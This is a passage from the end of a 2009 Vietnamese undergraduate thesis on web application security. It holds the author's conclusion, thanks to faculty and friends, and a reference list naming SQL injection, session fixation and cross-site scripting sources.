Web mà phát triển hơn vần đề bảo mật ở các hệ thống mạng và dịch vụ.
• Áp dụng những kiến thức về phòng chống tấn công ứng dụng web vào công
việc thực tế.
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 43 - Đại học Công Nghệ - ĐHQGHN
LỜI KẾT
Khóa luận đã trình bày và tìm hiểu về bảo mật ứng dụng web và các lỗ hổng bảo
mật trong ứng dụng web. Trải qua quãng thời gian thực hiện đề tài cùng với thầy giáo
Lê Hồng Hải, tác giả đã thu được nhiều hiểu biết về ứng dụng web và bảo mật, tạo cho
bản thân một nền tảng về bảo mật ứng dụng web. Những kiến thức này sẽ rất có tính
thực tiễn khi tham gia vào xây dựng một hệ thống trong tương lai.
Thông qua khóa luận này, em xin được gửi lời tri ân và lời chào tạm biệt tới tất
cả các thầy cô, cùng bạn bè sau gần 4 năm gắn bó thời sinh viên. Xin cảm ơn mái
trường Công Nghệ thân yêu – nơi rèn luyện và trưởng thành của tuổi trẻ.
Hà Nội, tháng 5 năm 2009
Sinh viên
Dương Thị Thu Hương
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 44 - Đại học Công Nghệ - ĐHQGHN
TÀI LIỆU THAM KHẢO
[1] Lê Đình Duy Tấn công kiểu SQL Injection – tác hại và phòng tránh.
[2] State-Based Attacks
[3] State-Based Attacks
StateBasedAttacks-6.pdf.
[4] Matthew Dailey Web Application Engineering,Web Application Security
&course_page=lecture_notes
[5] session_fixation
[6] Web-Application
Applications.html
[7] Cross-site scripting
Các file đính kèm theo tài liệu này:
- Luận văn tốt nghiệp-Một số vấn đề bảo mật ứng dụng web.pdf